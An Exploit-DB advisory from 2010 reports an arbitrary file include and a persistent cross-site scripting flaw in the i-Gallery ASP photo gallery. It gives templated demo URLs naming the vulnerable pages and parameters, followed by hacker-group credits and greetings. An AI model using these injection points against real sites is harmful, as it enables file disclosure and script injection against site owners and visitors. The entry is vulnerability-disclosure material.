i-Gallery - Multiple Vulnerabilities

EDB-ID:

14284

CVE:

N/A

EDB Verified:

Author:

SONIC

Type:

webapps

Exploit: /

Platform:

ASP

Date:

2010-07-08

Vulnerable App:

==============================================================
i-Gallery --Multiple Vulnerability
==============================================================


Name : i-Gallery --Multiple Vulnerability
Date : july 9,2010
Critical Level     :VERY HIGH
vendor URL :   http://www.b-cp.com


Author : ..::[ SONiC ]::.. aka ~the_pshyco~ <sonicdefence[at]gmail.com>

special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,Bunny,Nishi,MA1201,RJ,D3aD F0x

greetz to :www.topsecure.net ,All ICW members , iNj3cT0r.com, www.andhrahackers.com

special Shoutz : my Girl Frnd [H*****] 
###################################
I'm SONiC member from Inj3ct0r Team
################################### 

Description:

i-Gallery is a complete online photo gallery. Easy to navigate thumbnails with paging. Enlarged views offer print & email buttons. Secured backend features: create/delete folders, upload/delete images, add descriptions, move images, and much more.

#######################################################################################################
Xploit :Arbitrary File Include  Vulnerabilty 

DEMO URL  http://www.site.com/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024

Xploit :Persistent XSS Vulnerabilty 

DEMO URL  http://www.site.com/igallery34/submitphotos.asp?mi=1



###############################################################################################################

# ..::[ SONiC ]::.. aka the_pshyco

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services